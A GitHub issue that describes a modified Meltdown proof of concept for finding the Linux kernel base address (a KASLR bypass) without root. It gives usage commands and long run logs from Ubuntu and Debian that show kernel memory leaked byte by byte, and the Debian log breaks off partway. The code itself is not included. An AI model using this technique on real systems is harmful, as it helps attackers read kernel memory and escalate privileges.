Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Meltdown as KASLR bypass #67

Open
bcoles opened this issue Jan 5, 2020 · 0 comments
Open

Meltdown as KASLR bypass #67

bcoles opened this issue Jan 5, 2020 · 0 comments

Comments

@bcoles
Copy link

bcoles commented Jan 5, 2020

Can't defeat KASLR yet, so you may need to enter your password to find linux_proc_banner in the /proc/kallsyms (or do it manually).

Here's a modified version of meltdown.c using an extremely simplistic implementation (lazy hack) to find the kernel virtual address space, from which the base address can be inferred, without requiring root privileges (x86_64 only). Leaving this here in case it is useful.

Given the size of the kernel, and that the kernel is aligned, it is reasonable to expect that some symbols (such as debug or linux_proc_banner) can be found within the first ~100 bytes while iterating over the potential kernel virtual address space.

This technique iterates with a step of 0x100000, across the kernel virtual address space 0xffffffff80000000 to 0xffffffffffffffff [1], and checks the first 100 bytes for debug or linux_proc_banner.

Possibly the laziest and slowest approach possible. It is not efficient. It is not optimized. It does not implement the techniques in the paper.

Also, not that the printed offset may be off by a couple of bytes. I cared only about locating the kernel, not the exact offset.

Usage:  ./a.out <start address> <number of bytes to search>

Depending on the target kernel, a faster technique may be to modify the hard-coded step to iterate 0x1000000 (rather than 0x100000) using offset a00000; ie: ./a.out 0xffffffff80a00000 100.

Ubuntu 16.04 (4.4.0-21-generic)

test@ubuntu-16-04-x64:~/Desktop/meltdown-exploit$ time ./a.out 0xffffffff80000000 100
cached = 65, uncached = 285, threshold 136
read ffffffff80000000 = ff   (score=0/1000)
read ffffffff80000001 = ff   (score=0/1000)
read ffffffff80000002 = ff   (score=0/1000)
read ffffffff80000003 = ff   (score=0/1000)
read ffffffff80000004 = ff   (score=0/1000)
read ffffffff80000005 = ff   (score=0/1000)
read ffffffff80000006 = ff   (score=0/1000)
read ffffffff80000007 = ff   (score=0/1000)
read ffffffff80000008 = ff   (score=0/1000)
read ffffffff80000009 = ff   (score=0/1000)
read ffffffff8000000a = ff   (score=0/1000)
read ffffffff8000000b = ff   (score=0/1000)
read ffffffff8000000c = ff   (score=0/1000)
read ffffffff8000000d = ff   (score=0/1000)
read ffffffff8000000e = ff   (score=0/1000)
read ffffffff8000000f = ff   (score=0/1000)
read ffffffff80000010 = ff   (score=0/1000)
read ffffffff80000011 = ff   (score=0/1000)
read ffffffff80000012 = ff   (score=0/1000)
read ffffffff80000013 = ff   (score=0/1000)
read ffffffff80000014 = ff   (score=0/1000)
read ffffffff80000015 = ff   (score=0/1000)
read ffffffff80000016 = ff   (score=0/1000)
read ffffffff80000017 = ff   (score=0/1000)
read ffffffff80000018 = ff   (score=0/1000)
read ffffffff80000019 = ff   (score=0/1000)
read ffffffff8000001a = ff   (score=0/1000)
read ffffffff8000001b = ff   (score=0/1000)
read ffffffff8000001c = ff   (score=0/1000)
read ffffffff8000001d = ff   (score=0/1000)
read ffffffff8000001e = ff   (score=0/1000)
read ffffffff8000001f = ff   (score=0/1000)
read ffffffff80000020 = ff   (score=0/1000)
read ffffffff80000021 = ff   (score=0/1000)
read ffffffff80000022 = ff   (score=0/1000)
read ffffffff80000023 = ff   (score=0/1000)
read ffffffff80000024 = ff   (score=0/1000)
read ffffffff80000025 = ff   (score=0/1000)
read ffffffff80000026 = ff   (score=0/1000)
read ffffffff80000027 = ff   (score=0/1000)
read ffffffff80000028 = ff   (score=0/1000)
read ffffffff80000029 = ff   (score=0/1000)
read ffffffff8000002a = ff   (score=0/1000)
read ffffffff8000002b = ff   (score=0/1000)
read ffffffff8000002c = ff   (score=0/1000)
read ffffffff8000002d = ff   (score=0/1000)
read ffffffff8000002e = ff   (score=0/1000)
read ffffffff8000002f = ff   (score=0/1000)
read ffffffff80000030 = ff   (score=0/1000)
read ffffffff80000031 = ff   (score=0/1000)
read ffffffff80000032 = ff   (score=0/1000)
read ffffffff80000033 = ff   (score=0/1000)
read ffffffff80000034 = ff   (score=0/1000)
read ffffffff80000035 = ff   (score=0/1000)
read ffffffff80000036 = ff   (score=0/1000)
read ffffffff80000037 = ff   (score=0/1000)
read ffffffff80000038 = ff   (score=0/1000)
read ffffffff80000039 = ff   (score=0/1000)
read ffffffff8000003a = ff   (score=0/1000)
read ffffffff8000003b = ff   (score=0/1000)
read ffffffff8000003c = ff   (score=0/1000)
read ffffffff8000003d = ff   (score=0/1000)
read ffffffff8000003e = ff   (score=0/1000)
read ffffffff8000003f = ff   (score=0/1000)
read ffffffff80000040 = ff   (score=0/1000)
read ffffffff80000041 = ff   (score=0/1000)
read ffffffff80000042 = ff   (score=0/1000)
read ffffffff80000043 = ff   (score=0/1000)
read ffffffff80000044 = ff   (score=0/1000)
read ffffffff80000045 = ff   (score=0/1000)
read ffffffff80000046 = ff   (score=0/1000)
read ffffffff80000047 = ff   (score=0/1000)
read ffffffff80000048 = ff   (score=0/1000)
read ffffffff80000049 = ff   (score=0/1000)
read ffffffff8000004a = ff   (score=0/1000)
read ffffffff8000004b = ff   (score=0/1000)
read ffffffff8000004c = ff   (score=0/1000)
read ffffffff8000004d = ff   (score=0/1000)
read ffffffff8000004e = ff   (score=0/1000)
read ffffffff8000004f = ff   (score=0/1000)
read ffffffff80000050 = ff   (score=0/1000)
read ffffffff80000051 = ff   (score=0/1000)
read ffffffff80000052 = ff   (score=0/1000)
read ffffffff80000053 = ff   (score=0/1000)
read ffffffff80000054 = ff   (score=0/1000)
read ffffffff80000055 = ff   (score=0/1000)
read ffffffff80000056 = ff   (score=0/1000)
read ffffffff80000057 = ff   (score=0/1000)
read ffffffff80000058 = ff   (score=0/1000)
read ffffffff80000059 = ff   (score=0/1000)
read ffffffff8000005a = ff   (score=0/1000)
read ffffffff8000005b = ff   (score=0/1000)
read ffffffff8000005c = ff   (score=0/1000)
read ffffffff8000005d = ff   (score=0/1000)
read ffffffff8000005e = ff   (score=0/1000)
read ffffffff8000005f = ff   (score=0/1000)
read ffffffff80000060 = ff   (score=0/1000)
read ffffffff80000061 = ff   (score=0/1000)
read ffffffff80000062 = ff   (score=0/1000)
read ffffffff80000063 = ff   (score=0/1000)
read ffffffff80000064 = ff   (score=0/1000)
read ffffffff80000065 = ff   (score=0/1000)
read ffffffff80000066 = ff   (score=0/1000)
read ffffffff80000067 = ff   (score=0/1000)
read ffffffff80000068 = ff   (score=0/1000)
read ffffffff80000069 = ff   (score=0/1000)
read ffffffff8000006a = ff   (score=0/1000)
read ffffffff8000006b = ff   (score=0/1000)
read ffffffff8000006c = ff   (score=0/1000)
read ffffffff8000006d = ff   (score=0/1000)
read ffffffff8000006e = ff   (score=0/1000)
read ffffffff8000006f = ff   (score=0/1000)
read ffffffff80000070 = ff   (score=0/1000)
read ffffffff80000071 = ff   (score=0/1000)
read ffffffff80000072 = ff   (score=0/1000)
read ffffffff80000073 = ff   (score=0/1000)
read ffffffff80000074 = ff   (score=0/1000)
read ffffffff80000075 = ff   (score=0/1000)
read ffffffff80000076 = ff   (score=0/1000)
read ffffffff80000077 = ff   (score=0/1000)
read ffffffff80000078 = ff   (score=0/1000)
read ffffffff80000079 = ff   (score=0/1000)
read ffffffff8000007a = ff   (score=0/1000)
read ffffffff8000007b = ff   (score=0/1000)
read ffffffff8000007c = ff   (score=0/1000)
read ffffffff8000007d = ff   (score=0/1000)
read ffffffff8000007e = ff   (score=0/1000)
read ffffffff8000007f = ff   (score=0/1000)
read ffffffff80000080 = ff   (score=0/1000)
read ffffffff80000081 = ff   (score=0/1000)
read ffffffff80000082 = ff   (score=0/1000)
read ffffffff80000083 = ff   (score=0/1000)
read ffffffff80000084 = ff   (score=0/1000)
read ffffffff80000085 = ff   (score=0/1000)
read ffffffff80000086 = ff   (score=0/1000)
read ffffffff80000087 = ff   (score=0/1000)
read ffffffff80000088 = ff   (score=0/1000)
read ffffffff80000089 = ff   (score=0/1000)
read ffffffff8000008a = ff   (score=0/1000)
read ffffffff8000008b = ff   (score=0/1000)
read ffffffff8000008c = ff   (score=0/1000)
read ffffffff8000008d = ff   (score=0/1000)
read ffffffff8000008e = ff   (score=0/1000)
read ffffffff8000008f = ff   (score=0/1000)
read ffffffff80000090 = ff   (score=0/1000)
read ffffffff80000091 = ff   (score=0/1000)
read ffffffff80000092 = ff   (score=0/1000)
read ffffffff80000093 = ff   (score=0/1000)
read ffffffff80000094 = ff   (score=0/1000)
read ffffffff80000095 = ff   (score=0/1000)
read ffffffff80000096 = ff   (score=0/1000)
read ffffffff80000097 = ff   (score=0/1000)
read ffffffff80000098 = ff   (score=0/1000)
read ffffffff80000099 = ff   (score=0/1000)
read ffffffff8000009a = ff   (score=0/1000)
read ffffffff8000009b = ff   (score=0/1000)
read ffffffff8000009c = ff   (score=0/1000)
read ffffffff8000009d = ff   (score=0/1000)
read ffffffff8000009e = ff   (score=0/1000)
read ffffffff8000009f = ff   (score=0/1000)
read ffffffff800000a0 = ff   (score=0/1000)
read ffffffff800000a1 = ff   (score=0/1000)
read ffffffff800000a2 = ff   (score=0/1000)
read ffffffff800000a3 = ff   (score=0/1000)
read ffffffff800000a4 = ff   (score=0/1000)
read ffffffff800000a5 = ff   (score=0/1000)
read ffffffff800000a6 = ff   (score=0/1000)
read ffffffff800000a7 = ff   (score=0/1000)
read ffffffff800000a8 = ff   (score=0/1000)
read ffffffff800000a9 = ff   (score=0/1000)
read ffffffff800000aa = ff   (score=0/1000)
read ffffffff800000ab = ff   (score=0/1000)
read ffffffff800000ac = ff   (score=0/1000)
read ffffffff800000ad = ff   (score=0/1000)
read ffffffff800000ae = ff   (score=0/1000)
read ffffffff800000af = ff   (score=0/1000)
read ffffffff800000b0 = ff   (score=0/1000)
read ffffffff800000b1 = ff   (score=0/1000)
read ffffffff800000b2 = ff   (score=0/1000)
read ffffffff800000b3 = ff   (score=0/1000)
read ffffffff800000b4 = ff   (score=0/1000)
read ffffffff800000b5 = ff   (score=0/1000)
read ffffffff800000b6 = ff   (score=0/1000)
read ffffffff800000b7 = ff   (score=0/1000)
read ffffffff800000b8 = ff   (score=0/1000)
read ffffffff800000b9 = ff   (score=0/1000)
read ffffffff800000ba = ff   (score=0/1000)
read ffffffff800000bb = ff   (score=0/1000)
read ffffffff800000bc = ff   (score=0/1000)
read ffffffff800000bd = ff   (score=0/1000)
read ffffffff800000be = ff   (score=0/1000)
read ffffffff800000bf = ff   (score=0/1000)
read ffffffff800000c0 = ff   (score=0/1000)
read ffffffff800000c1 = ff   (score=0/1000)
read ffffffff800000c2 = ff   (score=0/1000)
read ffffffff800000c3 = ff   (score=0/1000)
read ffffffff800000c4 = ff   (score=0/1000)
read ffffffff800000c5 = ff   (score=0/1000)
read ffffffff800000c6 = ff   (score=0/1000)
read ffffffff800000c7 = ff   (score=0/1000)
read ffffffff800000c8 = ff   (score=0/1000)
read ffffffff800000c9 = ff   (score=0/1000)
read ffffffff800000ca = ff   (score=0/1000)
read ffffffff800000cb = ff   (score=0/1000)
read ffffffff800000cc = ff   (score=0/1000)
read ffffffff800000cd = ff   (score=0/1000)
read ffffffff800000ce = ff   (score=0/1000)
read ffffffff800000cf = ff   (score=0/1000)
read ffffffff800000d0 = ff   (score=0/1000)
read ffffffff800000d1 = ff   (score=0/1000)
read ffffffff800000d2 = ff   (score=0/1000)
read ffffffff800000d3 = ff   (score=0/1000)
read ffffffff800000d4 = ff   (score=0/1000)
read ffffffff800000d5 = ff   (score=0/1000)
read ffffffff800000d6 = ff   (score=0/1000)
read ffffffff800000d7 = ff   (score=0/1000)
read ffffffff800000d8 = ff   (score=0/1000)
read ffffffff800000d9 = ff   (score=0/1000)
read ffffffff800000da = ff   (score=0/1000)
read ffffffff800000db = ff   (score=0/1000)
read ffffffff800000dc = ff   (score=0/1000)
read ffffffff800000dd = ff   (score=0/1000)
read ffffffff800000de = ff   (score=0/1000)
read ffffffff800000df = ff   (score=0/1000)
read ffffffff800000e0 = ff   (score=0/1000)
read ffffffff800000e1 = ff   (score=0/1000)
read ffffffff800000e2 = ff   (score=0/1000)
read ffffffff800000e3 = ff   (score=0/1000)
read ffffffff800000e4 = ff   (score=0/1000)
read ffffffff800000e5 = ff   (score=0/1000)
read ffffffff800000e6 = ff   (score=0/1000)
read ffffffff800000e7 = ff   (score=0/1000)
read ffffffff800000e8 = ff   (score=0/1000)
read ffffffff800000e9 = ff   (score=0/1000)
read ffffffff800000ea = ff   (score=0/1000)
read ffffffff800000eb = ff   (score=0/1000)
read ffffffff800000ec = ff   (score=0/1000)
read ffffffff800000ed = ff   (score=0/1000)
read ffffffff800000ee = ff   (score=0/1000)
read ffffffff800000ef = ff   (score=0/1000)
read ffffffff800000f0 = ff   (score=0/1000)
read ffffffff800000f1 = ff   (score=0/1000)
read ffffffff800000f2 = ff   (score=0/1000)
read ffffffff800000f3 = ff   (score=0/1000)
read ffffffff800000f4 = ff   (score=0/1000)
read ffffffff800000f5 = ff   (score=0/1000)
read ffffffff800000f6 = ff   (score=0/1000)
read ffffffff800000f7 = ff   (score=0/1000)
read ffffffff800000f8 = ff   (score=0/1000)
read ffffffff800000f9 = ff   (score=0/1000)
read ffffffff800000fa = ff   (score=0/1000)
read ffffffff800000fb = ff   (score=0/1000)
read ffffffff800000fc = ff   (score=0/1000)
read ffffffff800000fd = ff   (score=0/1000)
read ffffffff800000fe = ff   (score=0/1000)
read ffffffff800000ff = ff   (score=0/1000)
Dumped: ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
NOT VULNERABLE

[...]

cached = 31, uncached = 260, threshold 89
read ffffffff81a00000 = ff   (score=0/1000)
read ffffffff81a00001 = ff   (score=0/1000)
read ffffffff81a00002 = ff   (score=0/1000)
read ffffffff81a00003 = ff   (score=0/1000)
read ffffffff81a00004 = ff   (score=0/1000)
read ffffffff81a00005 = ff   (score=0/1000)
read ffffffff81a00006 = ff   (score=0/1000)
read ffffffff81a00007 = ff   (score=0/1000)
read ffffffff81a00008 = ff   (score=0/1000)
read ffffffff81a00009 = ff   (score=0/1000)
read ffffffff81a0000a = ff   (score=0/1000)
read ffffffff81a0000b = ff   (score=0/1000)
read ffffffff81a0000c = ff   (score=0/1000)
read ffffffff81a0000d = ff   (score=0/1000)
read ffffffff81a0000e = ff   (score=0/1000)
read ffffffff81a0000f = ff   (score=0/1000)
read ffffffff81a00010 = ff   (score=0/1000)
read ffffffff81a00011 = ff   (score=0/1000)
read ffffffff81a00012 = ff   (score=0/1000)
read ffffffff81a00013 = ff   (score=0/1000)
read ffffffff81a00014 = ff   (score=0/1000)
read ffffffff81a00015 = ff   (score=0/1000)
read ffffffff81a00016 = ff   (score=0/1000)
read ffffffff81a00017 = ff   (score=0/1000)
read ffffffff81a00018 = ff   (score=0/1000)
read ffffffff81a00019 = ff   (score=0/1000)
read ffffffff81a0001a = ff   (score=0/1000)
read ffffffff81a0001b = ff   (score=0/1000)
read ffffffff81a0001c = ff   (score=0/1000)
read ffffffff81a0001d = ff   (score=0/1000)
read ffffffff81a0001e = ff   (score=0/1000)
read ffffffff81a0001f = ff   (score=0/1000)
read ffffffff81a00020 = ff   (score=0/1000)
read ffffffff81a00021 = ff   (score=0/1000)
read ffffffff81a00022 = ff   (score=0/1000)
read ffffffff81a00023 = ff   (score=0/1000)
read ffffffff81a00024 = ff   (score=0/1000)
read ffffffff81a00025 = ff   (score=0/1000)
read ffffffff81a00026 = ff   (score=0/1000)
read ffffffff81a00027 = ff   (score=0/1000)
read ffffffff81a00028 = ff   (score=0/1000)
read ffffffff81a00029 = ff   (score=0/1000)
read ffffffff81a0002a = ff   (score=0/1000)
read ffffffff81a0002b = ff   (score=0/1000)
read ffffffff81a0002c = ff   (score=0/1000)
read ffffffff81a0002d = ff   (score=0/1000)
read ffffffff81a0002e = ff   (score=0/1000)
read ffffffff81a0002f = ff   (score=0/1000)
read ffffffff81a00030 = ff   (score=0/1000)
read ffffffff81a00031 = ff   (score=0/1000)
read ffffffff81a00032 = ff   (score=0/1000)
read ffffffff81a00033 = ff   (score=0/1000)
read ffffffff81a00034 = ff   (score=0/1000)
read ffffffff81a00035 = ff   (score=0/1000)
read ffffffff81a00036 = ff   (score=0/1000)
read ffffffff81a00037 = ff   (score=0/1000)
read ffffffff81a00038 = ff   (score=0/1000)
read ffffffff81a00039 = ff   (score=0/1000)
read ffffffff81a0003a = ff   (score=0/1000)
read ffffffff81a0003b = ff   (score=0/1000)
read ffffffff81a0003c = ff   (score=0/1000)
read ffffffff81a0003d = ff   (score=0/1000)
read ffffffff81a0003e = ff   (score=0/1000)
read ffffffff81a0003f = ff   (score=0/1000)
read ffffffff81a00040 = 5f _ (score=973/1000)
read ffffffff81a00041 = 64 d (score=968/1000)
read ffffffff81a00042 = 65 e (score=977/1000)
read ffffffff81a00043 = 62 b (score=971/1000)
read ffffffff81a00044 = 75 u (score=977/1000)
read ffffffff81a00045 = 67 g (score=981/1000)
read ffffffff81a00046 = ff   (score=0/1000)
read ffffffff81a00047 = ff   (score=0/1000)
read ffffffff81a00048 = ff   (score=0/1000)
read ffffffff81a00049 = ff   (score=0/1000)
read ffffffff81a0004a = ff   (score=0/1000)
read ffffffff81a0004b = ff   (score=0/1000)
read ffffffff81a0004c = ff   (score=0/1000)
read ffffffff81a0004d = ff   (score=0/1000)
read ffffffff81a0004e = ff   (score=0/1000)
read ffffffff81a0004f = ff   (score=0/1000)
read ffffffff81a00050 = ff   (score=0/1000)
read ffffffff81a00051 = ff   (score=0/1000)
read ffffffff81a00052 = ff   (score=0/1000)
read ffffffff81a00053 = ff   (score=0/1000)
read ffffffff81a00054 = ff   (score=0/1000)
read ffffffff81a00055 = ff   (score=0/1000)
read ffffffff81a00056 = ff   (score=0/1000)
read ffffffff81a00057 = ff   (score=0/1000)
read ffffffff81a00058 = ff   (score=0/1000)
read ffffffff81a00059 = ff   (score=0/1000)
read ffffffff81a0005a = ff   (score=0/1000)
read ffffffff81a0005b = ff   (score=0/1000)
read ffffffff81a0005c = ff   (score=0/1000)
read ffffffff81a0005d = ff   (score=0/1000)
read ffffffff81a0005e = ff   (score=0/1000)
read ffffffff81a0005f = ff   (score=0/1000)
read ffffffff81a00060 = 25 % (score=980/1000)
read ffffffff81a00061 = 73 s (score=978/1000)
read ffffffff81a00062 = 20   (score=983/1000)
read ffffffff81a00063 = 76 v (score=971/1000)
read ffffffff81a00064 = 65 e (score=969/1000)
read ffffffff81a00065 = 72 r (score=980/1000)
read ffffffff81a00066 = 73 s (score=974/1000)
read ffffffff81a00067 = 69 i (score=979/1000)
read ffffffff81a00068 = 6f o (score=980/1000)
read ffffffff81a00069 = 6e n (score=972/1000)
read ffffffff81a0006a = 20   (score=978/1000)
read ffffffff81a0006b = 25 % (score=984/1000)
read ffffffff81a0006c = 73 s (score=978/1000)
read ffffffff81a0006d = 20   (score=982/1000)
read ffffffff81a0006e = 28 ( (score=980/1000)
read ffffffff81a0006f = 62 b (score=974/1000)
read ffffffff81a00070 = 75 u (score=976/1000)
read ffffffff81a00071 = 69 i (score=980/1000)
read ffffffff81a00072 = 6c l (score=975/1000)
read ffffffff81a00073 = 64 d (score=968/1000)
read ffffffff81a00074 = 64 d (score=970/1000)
read ffffffff81a00075 = 40 @ (score=983/1000)
read ffffffff81a00076 = 6c l (score=981/1000)
read ffffffff81a00077 = 67 g (score=984/1000)
read ffffffff81a00078 = 77 w (score=979/1000)
read ffffffff81a00079 = 30 0 (score=979/1000)
read ffffffff81a0007a = 31 1 (score=984/1000)
read ffffffff81a0007b = 2d - (score=980/1000)
read ffffffff81a0007c = 32 2 (score=980/1000)
read ffffffff81a0007d = 31 1 (score=934/1000)
read ffffffff81a0007e = 29 ) (score=978/1000)
read ffffffff81a0007f = 20   (score=981/1000)
read ffffffff81a00080 = 28 ( (score=989/1000)
read ffffffff81a00081 = 67 g (score=996/1000)
read ffffffff81a00082 = 63 c (score=982/1000)
read ffffffff81a00083 = 63 c (score=985/1000)
read ffffffff81a00084 = 20   (score=985/1000)
read ffffffff81a00085 = 76 v (score=990/1000)
read ffffffff81a00086 = 65 e (score=977/1000)
read ffffffff81a00087 = 72 r (score=994/1000)
read ffffffff81a00088 = 73 s (score=993/1000)
read ffffffff81a00089 = 69 i (score=989/1000)
read ffffffff81a0008a = 6f o (score=986/1000)
read ffffffff81a0008b = 6e n (score=980/1000)
read ffffffff81a0008c = 20   (score=978/1000)
read ffffffff81a0008d = 35 5 (score=981/1000)
read ffffffff81a0008e = 2e . (score=979/1000)
read ffffffff81a0008f = 33 3 (score=994/1000)
read ffffffff81a00090 = 2e . (score=982/1000)
read ffffffff81a00091 = 31 1 (score=992/1000)
read ffffffff81a00092 = 20   (score=988/1000)
read ffffffff81a00093 = 32 2 (score=990/1000)
read ffffffff81a00094 = 30 0 (score=995/1000)
read ffffffff81a00095 = 31 1 (score=985/1000)
read ffffffff81a00096 = 36 6 (score=984/1000)
read ffffffff81a00097 = 30 0 (score=994/1000)
read ffffffff81a00098 = 34 4 (score=985/1000)
read ffffffff81a00099 = 31 1 (score=986/1000)
read ffffffff81a0009a = 33 3 (score=989/1000)
read ffffffff81a0009b = 20   (score=993/1000)
read ffffffff81a0009c = 28 ( (score=993/1000)
read ffffffff81a0009d = 55 U (score=985/1000)
read ffffffff81a0009e = 62 b (score=986/1000)
read ffffffff81a0009f = 75 u (score=987/1000)
read ffffffff81a000a0 = 6e n (score=984/1000)
read ffffffff81a000a1 = 74 t (score=993/1000)
read ffffffff81a000a2 = 75 u (score=989/1000)
read ffffffff81a000a3 = 20   (score=989/1000)
read ffffffff81a000a4 = 35 5 (score=992/1000)
read ffffffff81a000a5 = 2e . (score=987/1000)
read ffffffff81a000a6 = 33 3 (score=988/1000)
read ffffffff81a000a7 = 2e . (score=978/1000)
read ffffffff81a000a8 = 31 1 (score=992/1000)
read ffffffff81a000a9 = 2d - (score=991/1000)
read ffffffff81a000aa = 31 1 (score=983/1000)
read ffffffff81a000ab = 34 4 (score=987/1000)
read ffffffff81a000ac = 75 u (score=994/1000)
read ffffffff81a000ad = 62 b (score=986/1000)
read ffffffff81a000ae = 75 u (score=994/1000)
read ffffffff81a000af = 6e n (score=978/1000)
read ffffffff81a000b0 = 74 t (score=992/1000)
read ffffffff81a000b1 = 75 u (score=988/1000)
read ffffffff81a000b2 = 32 2 (score=987/1000)
read ffffffff81a000b3 = 29 ) (score=990/1000)
read ffffffff81a000b4 = 20   (score=987/1000)
read ffffffff81a000b5 = 29 ) (score=990/1000)
read ffffffff81a000b6 = 20   (score=993/1000)
read ffffffff81a000b7 = 25 % (score=997/1000)
read ffffffff81a000b8 = 73 s (score=988/1000)
read ffffffff81a000b9 = ff   (score=0/1000)
read ffffffff81a000ba = ff   (score=0/1000)
read ffffffff81a000bb = ff   (score=0/1000)
read ffffffff81a000bc = ff   (score=0/1000)
read ffffffff81a000bd = ff   (score=0/1000)
read ffffffff81a000be = ff   (score=0/1000)
read ffffffff81a000bf = ff   (score=0/1000)
read ffffffff81a000c0 = 4c L (score=988/1000)
read ffffffff81a000c1 = 69 i (score=988/1000)
read ffffffff81a000c2 = 6e n (score=979/1000)
read ffffffff81a000c3 = 75 u (score=985/1000)
read ffffffff81a000c4 = 78 x (score=988/1000)
read ffffffff81a000c5 = 20   (score=995/1000)
read ffffffff81a000c6 = 76 v (score=988/1000)
read ffffffff81a000c7 = 65 e (score=982/1000)
read ffffffff81a000c8 = 72 r (score=996/1000)
read ffffffff81a000c9 = 73 s (score=991/1000)
read ffffffff81a000ca = 69 i (score=990/1000)
read ffffffff81a000cb = 6f o (score=985/1000)
read ffffffff81a000cc = 6e n (score=983/1000)
read ffffffff81a000cd = 20   (score=989/1000)
read ffffffff81a000ce = 34 4 (score=987/1000)
read ffffffff81a000cf = 2e . (score=982/1000)
read ffffffff81a000d0 = 34 4 (score=990/1000)
read ffffffff81a000d1 = 2e . (score=986/1000)
read ffffffff81a000d2 = 30 0 (score=991/1000)
read ffffffff81a000d3 = 2d - (score=984/1000)
read ffffffff81a000d4 = 32 2 (score=992/1000)
read ffffffff81a000d5 = 31 1 (score=986/1000)
read ffffffff81a000d6 = 2d - (score=990/1000)
read ffffffff81a000d7 = 67 g (score=997/1000)
read ffffffff81a000d8 = 65 e (score=977/1000)
read ffffffff81a000d9 = 6e n (score=986/1000)
read ffffffff81a000da = 65 e (score=985/1000)
read ffffffff81a000db = 72 r (score=993/1000)
read ffffffff81a000dc = 69 i (score=984/1000)
read ffffffff81a000dd = 63 c (score=989/1000)
read ffffffff81a000de = 20   (score=993/1000)
read ffffffff81a000df = 28 ( (score=991/1000)
read ffffffff81a000e0 = 62 b (score=987/1000)
read ffffffff81a000e1 = 75 u (score=991/1000)
read ffffffff81a000e2 = 69 i (score=990/1000)
read ffffffff81a000e3 = 6c l (score=986/1000)
read ffffffff81a000e4 = 64 d (score=986/1000)
read ffffffff81a000e5 = 64 d (score=988/1000)
read ffffffff81a000e6 = 40 @ (score=986/1000)
read ffffffff81a000e7 = 6c l (score=984/1000)
read ffffffff81a000e8 = 67 g (score=992/1000)
read ffffffff81a000e9 = 77 w (score=990/1000)
read ffffffff81a000ea = 30 0 (score=996/1000)
read ffffffff81a000eb = 31 1 (score=988/1000)
read ffffffff81a000ec = 2d - (score=992/1000)
read ffffffff81a000ed = 32 2 (score=986/1000)
read ffffffff81a000ee = 31 1 (score=989/1000)
read ffffffff81a000ef = 29 ) (score=987/1000)
read ffffffff81a000f0 = 20   (score=989/1000)
read ffffffff81a000f1 = 28 ( (score=984/1000)
read ffffffff81a000f2 = 67 g (score=994/1000)
read ffffffff81a000f3 = 63 c (score=975/1000)
read ffffffff81a000f4 = 63 c (score=986/1000)
read ffffffff81a000f5 = 20   (score=986/1000)
read ffffffff81a000f6 = 76 v (score=989/1000)
read ffffffff81a000f7 = 65 e (score=981/1000)
read ffffffff81a000f8 = 72 r (score=992/1000)
read ffffffff81a000f9 = 73 s (score=990/1000)
read ffffffff81a000fa = 69 i (score=988/1000)
read ffffffff81a000fb = 6f o (score=984/1000)
read ffffffff81a000fc = 6e n (score=983/1000)
read ffffffff81a000fd = 20   (score=982/1000)
read ffffffff81a000fe = 35 5 (score=987/1000)
read ffffffff81a000ff = 2e . (score=979/1000)
Dumped: ����������������������������������������������������������������_debug��������������������������%s version %s (buildd@lgw01-21) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) %s�������Linux version 4.4.0-21-generic (buildd@lgw01-21) (gcc version 5.
offset: 0x41 ; found __param_str_initcall_debug: ffffffff81a00041

real	3m31.602s
user	3m14.924s
sys	0m13.072s

Debian 9.0 (4.9.0-3-amd64)

user@debian-9-0-x64:~/Desktop/meltdown-exploit$ ./a.out 0xffffffffaec00000 100 
cached = 41, uncached = 265, threshold 104
read ffffffffaec00000 = ff   (score=0/1000)
read ffffffffaec00001 = ff   (score=0/1000)
read ffffffffaec00002 = ff   (score=0/1000)
read ffffffffaec00003 = ff   (score=0/1000)
read ffffffffaec00004 = ff   (score=0/1000)
read ffffffffaec00005 = ff   (score=0/1000)
read ffffffffaec00006 = ff   (score=0/1000)
read ffffffffaec00007 = ff   (score=0/1000)
read ffffffffaec00008 = ff   (score=0/1000)
read ffffffffaec00009 = ff   (score=0/1000)
read ffffffffaec0000a = ff   (score=0/1000)
read ffffffffaec0000b = ff   (score=0/1000)
read ffffffffaec0000c = ff   (score=0/1000)
read ffffffffaec0000d = ff   (score=0/1000)
read ffffffffaec0000e = ff   (score=0/1000)
read ffffffffaec0000f = ff   (score=0/1000)
read ffffffffaec00010 = ff   (score=0/1000)
read ffffffffaec00011 = ff   (score=0/1000)
read ffffffffaec00012 = ff   (score=0/1000)
read ffffffffaec00013 = ff   (score=0/1000)
read ffffffffaec00014 = ff   (score=0/1000)
read ffffffffaec00015 = ff   (score=0/1000)
read ffffffffaec00016 = ff   (score=0/1000)
read ffffffffaec00017 = ff   (score=0/1000)
read ffffffffaec00018 = ff   (score=0/1000)
read ffffffffaec00019 = ff   (score=0/1000)
read ffffffffaec0001a = ff   (score=0/1000)
read ffffffffaec0001b = ff   (score=0/1000)
read ffffffffaec0001c = ff   (score=0/1000)
read ffffffffaec0001d = ff   (score=0/1000)
read ffffffffaec0001e = ff   (score=0/1000)
read ffffffffaec0001f = ff   (score=0/1000)
read ffffffffaec00020 = ff   (score=0/1000)
read ffffffffaec00021 = ff   (score=0/1000)
read ffffffffaec00022 = ff   (score=0/1000)
read ffffffffaec00023 = ff   (score=0/1000)
read ffffffffaec00024 = ff   (score=0/1000)
read ffffffffaec00025 = ff   (score=0/1000)
read ffffffffaec00026 = ff   (score=0/1000)
read ffffffffaec00027 = ff   (score=0/1000)
read ffffffffaec00028 = ff   (score=0/1000)
read ffffffffaec00029 = ff   (score=0/1000)
read ffffffffaec0002a = ff   (score=0/1000)
read ffffffffaec0002b = ff   (score=0/1000)
read ffffffffaec0002c = ff   (score=0/1000)
read ffffffffaec0002d = ff   (score=0/1000)
read ffffffffaec0002e = ff   (score=0/1000)
read ffffffffaec0002f = ff   (score=0/1000)
read ffffffffaec00030 = ff   (score=0/1000)
read ffffffffaec00031 = ff   (score=0/1000)
read ffffffffaec00032 = ff   (score=0/1000)
read ffffffffaec00033 = ff   (score=0/1000)
read ffffffffaec00034 = ff   (score=0/1000)
read ffffffffaec00035 = ff   (score=0/1000)
read ffffffffaec00036 = ff   (score=0/1000)
read ffffffffaec00037 = ff   (score=0/1000)
read ffffffffaec00038 = ff   (score=0/1000)
read ffffffffaec00039 = ff   (score=0/1000)
read ffffffffaec0003a = ff   (score=0/1000)
read ffffffffaec0003b = ff   (score=0/1000)
read ffffffffaec0003c = ff   (score=0/1000)
read ffffffffaec0003d = ff   (score=0/1000)
